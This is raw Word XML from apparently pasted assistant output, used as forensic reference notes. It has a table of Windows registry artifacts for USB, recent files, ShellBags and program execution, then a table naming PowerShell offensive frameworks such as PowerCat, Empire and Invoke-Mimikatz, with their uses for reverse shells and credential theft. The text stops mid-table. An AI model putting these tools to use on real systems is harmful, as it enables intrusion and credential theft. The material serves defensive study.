              <w:t>HKLM\SOFTWARE\Microsoft\Windows\PortableDevices\DevicesHKLM\SYSTEM\CurrentControlSet\Enum\USBSTORUSB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C21DB49" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>USB device connections &amp; IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="1DD54A56" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="725E4E5A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>USB Connection Times</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26F0D7B2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>USBSTOR\&lt;Vendor&gt;\&lt;Serial#&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\Properties\{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>GUID} Values: 0064 (first), 0066 (last connect), 0067 (last removal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="008F8B07" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Connection timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="2AFF4BC1" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A9180F7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Bluetooth Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0D39CA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256EE977" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Paired BT devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="511DCD6F" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F09F692" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Recent Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C44EF24" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B972971" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Recent user files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="3F8DF001" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5EFF0D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Office Recent Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A6B8CDB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT\Software\Microsoft\Office\&lt;VERSION&gt;\UserMRU\LiveID_&lt;UserID&gt;\FileMRU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B07A692" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>MS Office MRUs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="34E4C6E2" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="433D1C59" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>ShellBags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t xml:space="preserve"> (Folder Views)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A754ED6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagsBagMRUNTUSER.DAT\Software\Microsoft\Windows\Shell\Bags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="215E2CAE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Folder viewing history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="7A9B2D0C" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47AEA45E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Open/Save Dialog MRUs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11E482F1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDLMRULastVisitedPidlMRU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06801465" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>File dialog history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="663CCD92" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1C14B4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Explorer Address/Search Bars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0653143D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPathsWordWheelQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3C0947" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Explorer address history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="273936D5" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A73FA4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:lastRenderedPageBreak/>
              <w:t>Program Execution History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C415C1B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>NTUSER.DAT</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>GUID}\CountAppCompatCache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3277565F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Execution and run history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00D9654C" w14:paraId="2BC6EAF1" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F94552" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Background &amp; Desktop Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE5409D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>HKLM</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\SYSTEM\CurrentControlSet\Services\bam\UserSettings\{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>SID}dam</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>\UserSettings\{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D9654C">
              <w:t>SID}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EECC179" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00D9654C">
              <w:t>Activity monitoring on Win8+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="092FEAEF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="3DF0EFCC">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E547BF7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00D9654C">
        <w:t>Would you like this delivered in a Word, PDF, or markdown file format for easy reference or printing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A245B7D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="3FD6C36B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="2D13C720" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="6420BA27" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Here’s the expanded version with short explanations for each framework, command, and suspicious parent process so the list becomes educational and practical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569262E0" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00000000" w:rsidP="00AE2D4F">
      <w:r>
        <w:pict w14:anchorId="0D29A00F">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E81D1E" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Well-Known PowerShell Offensive Frameworks (with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6916"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="03353E5C" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB1D767" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A1332E" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose / Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="3726C2E4" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA61050" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79CC8C14" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>A popular post-exploitation toolkit with modules for privilege escalation, persistence, and reconnaissance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="7DCCEC53" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="650F86C2" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PowerCat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB1A9D4" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve">PowerShell equivalent of Netcat, used for creating reverse shells and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>tunneling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve"> connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="5C180735" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="399322D7" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CAC6127" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Full-featured post-exploitation framework with agent-based communication, credential theft, and lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="154DA823" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D967A1" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DarkObserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F694A21" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Framework focused on stealthy monitoring and persistence techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="2B937155" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F37F984" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PowerMemory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="016C1CA4" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Extracts credentials directly from memory without touching disk, bypassing traditional defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="14597253" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526F94BC" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Invoke-Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA9C0E2" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
